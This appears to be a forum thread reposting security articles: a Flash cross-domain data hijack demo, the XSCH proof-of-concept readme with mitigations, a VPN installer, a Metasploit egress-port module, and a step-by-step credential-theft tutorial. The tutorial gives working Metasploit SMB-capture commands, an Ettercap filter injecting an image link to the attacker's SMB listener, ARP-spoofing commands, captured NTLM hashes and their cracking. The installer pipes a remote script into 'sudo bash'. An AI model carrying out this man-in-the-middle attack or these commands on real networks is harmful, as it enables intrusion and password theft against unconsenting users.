data, CSRF tokens, etc. The following demonstrates this issue: A) 0me.me = attacker’s website sdl.me = victim’s website C) A JPG file that is actually a Flash file has already been uploaded in the victim’s website: http://sdl.me/PoCs/CrossDomainDataHijack.jpg (Source code of this Flash file is accessible via the following link: http://0me.me/demo/SOP/CrossDomainDataHijack.as.txt ) D) There is a secret file in the victim’s website (sdl.me) that we are going to read by using the attacker’s website (0me.me): http://sdl.me/PoCs/secret.asp?mysecret=original E) Note that the victim’s website does not have any crossdomain.xml file: http://sdl.me/crossdomain.xml F) Now an attacker sends the following malicious link to a user of sdl.me (the victim’s website): Cross Domain Data Hijack By pressing the “RUN” button, 0me.me (attacker’s website) website can read contents of the secret.asp file which was in sdl.me (victim’ website). This is just a demo file that could be completely automated in a real scenario. Note: If another website such as Soroush.me has added sdl.me as trusted in its crossdomain.xml file, the attacker’s website can also now read the contents of Soroush.me by using this vulnerability. Limitations An attacker cannot read the cookies of the victim.com website. An attacker cannot run a JavaScript code directly by using this issue. Future works Other client-side technologies such as PDF, Java applets, and Silverlight might be used instead of the Flash technology. Bypassing the Flash security sandbox when a website uses “Content-Disposition: attachment;” can also be a research topic. If somebody bypasses this, many mail servers and file repositories will become vulnerable. Recommendations It is recommended to check the file’s content to have the correct header and format. If it is possible, use “Content-Disposition: attachment; filename=Filename.Extension;” header for the files that do not need to be served in the web browser. Flash actually logs a security warning for this. Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of the main website does not include the isolated domain. Sursa: https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
-
Cross-Site Content Hijacking (XSCH) PoC License Released under AGPL (see LICENSE for more information). Description This project can be used for: Exploiting websites with insecure policy files (crossdomain.xml or clientaccesspolicy.xml) by reading their contents. Exploiting insecure file upload functionalities which do not check the file contents properly or allow to upload SWF or PDF files without having Content-Disposition header during the download process. In this scenario, the created SWF, XAP, or PDF file should be uploaded with any extension such as .JPG to the target website. Then, the "Object File" value should be set to the URL of the uploaded file to read the target website's contents. Note: .XAP files can be renamed to any other extension but they cannot be load cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension. Usage Exploiting an insecure policy file: 1) Host the ContentHijacking directory with a web server. 2) Browse to the ContentHijacking.html page. 3) Change the target in the HTML page to a suitable object from the "objects" directory ("xfa-manual-ContentHijacking.pdf" cannot be used). Exploiting an insecure file upload/download: 1) Upload an object file from the "objects" directory to the victim server. These files can also be renamed with another extension when uploaded to another domain (for this purpose, first use Flash and then PDF as Silverlight XAP files will not normally work with another extension from another domain). 2) Change the target in the HTML page to the location of the uploaded file. Note: .XAP files can be renamed to any other extension but they cannot be load cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use “;” or “/” after the actual file name to add a “.XAP” extension. Note: When Silverlight requests a .XAP file cross-domain, the content type must be: application/x-silverlight-app. Note: PDF files can only be used in Adobe Reader viewer (they will not work with Chrome and Firefox built-in PDF viewers) Usage Example: in IE with Adobe Reader: https://15.rs/ContentHijacking/ContentHijacking.html?objFile=objects/ContentHijacking.pdf&objType=PDF&target=http://0me.me/&POSTData=Param1=Value1 Generic Recommendation to Solve the Security Issue The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. If in doubt, the file should be discarded. Adding “Content-Disposition: Attachment” header to static files will secure the website against Flash/PDF-based cross-site content hijacking attacks. It is recommended to perform this practice for all of the files that users need to download in all the modules that deal with a file download. Although this method does not secure the website against attacks by using Silverlight or similar objects, it can mitigate the risk of using Adobe Flash and PDF objects especially when uploading PDF files is permitted. Flash/PDF (crossdomain.xml) or Silverlight (clientaccesspolicy.xml) cross-domain policy files should be removed if they are not in use and there is no business requirement for Flash or Silverlight applications to communicate with the website. Cross-domain access should be restricted to a minimal set of domains that are trusted and will require access. An access policy is considered weak or insecure when a wildcard character is used especially in the value of the “uri” attribute. Any "crossdomain.xml" file which is used for Silverlight applications should be considered weak as it can only accept a wildcard (“*”) character in the domain attribute. Browser caching should be disabled for the corssdomain.xml and clientaccesspolicy.xml files. This enables the website to easily update the file or restrict access to the Web services if necessary. Once the client access policy file is checked, it remains in effect for the browser session so the impact of non-caching to the end-user is minimal. This can be raised as a low or informational risk issue based on the content of the target website and security and complexity of the policy file(s). Note: Using "Referer" header cannot be a solution as it is possible to set this header for example by sending a POST request using Adobe Reader and PDF (see the "xfa-manual-ContentHijacking.pdf" file in the "objects" directory). Project Page See the project page for the latest update/help: https://github.com/nccgroup/CrossSiteContentHijacking Author Soroush Dalili (@irsdl) from NCC Group References Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/ Multiple PDF Vulnerabilities - Text and Pictures on Steroids InsertScript: Multiple PDF Vulnerabilities - Text and Pictures on Steroids HTTP Communication and Security with Silverlight http://msdn.microsoft.com/en-gb/library/cc838250(v=vs.95).aspx Explanation Of Cross Domain And Client Access Policy Files For Silverlight http://www.devtoolshed.com/explanation-cross-domain-and-client-access-policy-files-silverlight Cross-domain policy file specification Cross-domain policy file specification | Adobe Developer Connection Setting a crossdomain.xml file for HTTP streaming Setting crossdomain.xml file for HTTP streaming | Adobe Developer Connection Sursa: https://github.com/nccgroup/CrossSiteContentHijacking
-
[h=1][/h] [h=3]Requirements[/h] Ubuntu 14.04 512 MB RAM [h=3]Install[/h] [h=5]curl -sS https://sockeye.cc/instavpn.sh | sudo bash[/h] [h=3]Web UI[/h] Browse at http://IP-ADDRESS:8080 [h=3]CLI[/h] instavpn list - Show all credentials instavpn stat - Show bandwidth statistics instavpn psk get - Get pre-shared key instavpn psk set <psk> - Set pre-shared key instavpn user get <username> - Get password instavpn user set <username> <password> - Set password or create user if not exists instavpn user delete <username> - Delete user instavpn user list - List all users instavpn web mode [on|off] - Turn on/off web UI instavpn web set <username> <password> - Set username/password for web UI Sursa: https://github.com/sockeye44/instavpn
-
[h=3]Metasploit: Getting outbound filtering rules by tracerouting[/h] Deciding between a bind or reverse shell depends greatly on the network environment in which we find ourselves. For example, in the case of choosing a bind shell we have to know in advance if your machine is reachable on any port from outside. Some time ago I wrote how we can get this information (inbound filtering rules) using the packetrecorder script from Meterpreter. Another alternative is to use a IPV6 bind shell (bind_ipv6_tcp). The idea of this payload is to create an IPv6 tunnel over IPv4 with Teredo-relay through which it will make the bind shell achievable from an IPv6 address. You can read more info about this in the post: Revenge of the bind shell. On the other hand, in the case of using a reverse shell, we must know the outbound filtering rules of the organization to see if our shell can go outside. In most situations, we usually choose 80 or 443 ports since these ports are rarely blocked for an ordinary user. However, there are cases in which we have a much more restrictive scenario. For example, if we get access to a server from an internal network and want to install a reverse shell from that server to the outside, maybe outgoing connections on ports 80 and 443 are denied. The reverse_tcp_allports() payload was created to work in such environments. This payload will attempt to connect to our handler (installed on certain external machine) using multiple ports. The payload supports the argument LPORT by which we specify the initial connection port. If It can not connect to the handler it will increase the port number 1 by 1 until a connection is done. The problem with this approach is that it is very slow due to timeouts of blocked connections. In addition, much noise is generated as a result of each of these connections. Because of the need to know which outgoing ports are allowed, I have made a post-exploitation Meterpreter module that allows you to infer TCP filtering rules for the desired ports. At first I thought to use the same logic as the MetaModule "Egrees Firewall Testing" built into Metasploit Pro v4.7. This MetaModule allows you to get outbound rules by sending SYN packets to one of the servers hosted by Rapid7 (egadz.metasploit.com). The server is configured to respond to all ports (all 65535 ports are open), so if your host receives a SYN/ACK you can deduce that certain port is not filtered. This service is similar to http://portquiz.net which I have used sometimes, usually on linux machines, to know the filtering policies of the organization in which I am doing a pentest. However, I did not like the idea of depending on a particular external service. Moreover, while it would be easy to prepare a machine with a couple of Iptables rules I still found it a bit cumbersome. After shuffling some options, I ended up creating the outbound_ports.rb module for Windows which does not depend on any service or external configuration. The module is a kind of traceroute using TCP packets with incremental TTL values. The idea is to launch a TCP connection to a public IP (this IP does not need to be under your control) with a low TTL value. As a result of the TTL some intermediate device will return an ICMP "TTL exceeded" packet. If the victim host is able to read that ICMP packet we can infer that the port used is not filtered. By default, the TTL will start with a value of 1 although this can be changed with the parameter MIN_TTL. With HOPS we indicate the number of peers to get. Personally I tend to use a low value since all I need is to get an ICMP response from a public IP. The module will also have the TIMEOUT parameter to set the waiting time of the ICMP socket. In the following example I've used the public IP 208.84.244.10 to check if the outbound connection to ports 443 and 8080 are filtered. As shown, we have obtained several ICMP replies from different routers; so now we know that those ports would be good candidates for our reverse shell. You can play around with the HOPS and MIN_TTL options. For example, if you do not want to create so much noise you can set an initial TTL of 3 and set the number of hops to 1. In that case, and unless the organization has a complex network, you could receive a quick response from an external IP. Another alternative is to set the STOP option to true. Thus, when a public IP responds with an ICMP packet, the script will not continue launching more connections. As you can tell, the module will also be useful to infer the network topology of our target; working in the same way that a "traceroute". Internally, the module will use two sockets, first a TCP socket in non-blocking mode. This socket will be in charge of launching SYN packets with different TTL values (set with the setsockopt API and the IP_TTL option). On the other hand, a raw ICMP socket will be needed to read the ICMP responses. Since Window's firewall blocks this type of packets by default the module will use netsh to allow incoming ICMP traffic. For now the module is under review. The module is already included in Metasploit. Posted by Borja Merino at 12:26 PM Sursa: Shell is coming ...: Metasploit: Getting outbound filtering rules by tracerouting
-
You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage. Note, your mileage may vary with this stew. I’m not Martha Stewart. Also the stew analogy ends here The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap. The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database. The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get rcracki_mt binary. You will also need to download the HALMLMCHALL rainbowtables so visit that same tutorial. The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card. sudo add-apt-repository ppa:xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 nvidia-settings-331 Now we have all our ingredients. Sorry, promised the analogy would end. Let’s Get To It! What we will accomplish is the Address Resolution Protocol (ARP) spoofing of a local network segment, inject HTML traffic whenever a user surfs the Internet/Intranet, and force clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that will force authentication with a known challenge request. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients) then a Rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card i.e. oclHashCat. Setting Up Metasploit SMB Server # service smbd stop smbd stop/waiting # /opt/metasploit-framework/msfconsole msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /tmp/john JOHNPWFILE => /tmp/john msf auxiliary(smb) > run [*] Auxiliary module execution completed [*] Server started. msf auxiliary(smb) > ARP Spoofing and Packet Filtering with Ettercap Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or effect network performance. While this is outside the scope of this article you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons. Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap. Open your favorite text editor and paste the code below. # vim http-img.filter if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body "); msg("Filter Ran 4.\n"); Once the file is saved you will use an Ettercap command to convert the code into the binary Ettercap will understand. # etterfilter http-img.filter -o http-img.ef etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'http-img.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'http-img.ef' done. -> Script encoded into 15 instructions. Copy the binary to the Ettercap share folder. #copy http-img.ef /usr/share/ettercap (may be /usr/local/share/ettercap) If you know your target you can start Ettercap from the command-line to begin sniffing, ARP Spoof, and filtering the traffic. # ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0 If you prefer the GUI then follow the screenshots found here. This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit msf auxiliary(smb) > [*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014 NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108 USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:09af7e143207525cfc17e4037a1f0a54 NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000 The last step we need to accomplish is crack the hash obtained. The example above has LMHASHing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test. One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline bruteforce tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty. Username::WINDOWSDOMAIN:<b>1d006cfe2f3a9f72</b>ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788 We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72 # cd ~/tools/rcracki_mt_0.7.0_linux_x86_64 ~/tools/rcracki_mt_0.7.0_linux_x86_64# # ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72 Using 1 threads for pre-calculation and false alarm checking... Found 4 rainbowtable files... halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti reading index... 13528977 bytes read, disk access time: 0.00 s reading table... 461190920 bytes read, disk access time: 0.00 s searching for 1 hash... plaintext of 1d006cfe2f3a9f72 is GOOSE00 cryptanalysis time: 0.06 s statistics ------------------------------------------------------- plaintext found: 1 of 1(100.00%) total disk access time: 0.00s total cryptanalysis time: 0.06s total pre-calculation time: 2.34s total chain walk step: 2876401 total false alarm: 31 total chain walk step due to false alarm: 68140 result ------------------------------------------------------- 1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030 Now to bruteforce the remaining portion of the password using a Ruby script that comes with Metasploit. # cd /opt/metasploit-framework/tools /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00 [*] Trying one character... [*] Trying two characters (eta: 12.858231544494629 seconds)... [*] Cracked: GOOSE004# Using the script to brute force up to 3 characters is about as far as you want to go with the halflm_second.rb script as you see in the example below. That is a ten character password which is not too shabby. As you see below a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window. Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788 /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI [*] Trying one character... [*] Trying two characters (eta: 10.010079860687256 seconds)... [*] Trying three characters (eta: 2292.3082880973816 seconds)... [*] Trying four characters (eta: 524938.5979743004 seconds)... An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take but know that it is exponentially longer and not even scripted into halflm_second.rb . So oclHashcat and GPU password cracking to the rescue! To continue the saga visit this tutorial on using Hashcat to bruteforce the second half of the password. Great sites to learn about Ettercap Filtering Fun with Ettercap Filters "Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples ETTERCAP - The Easy Tutorial - Man in the middle attacks Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security
-
- 1
-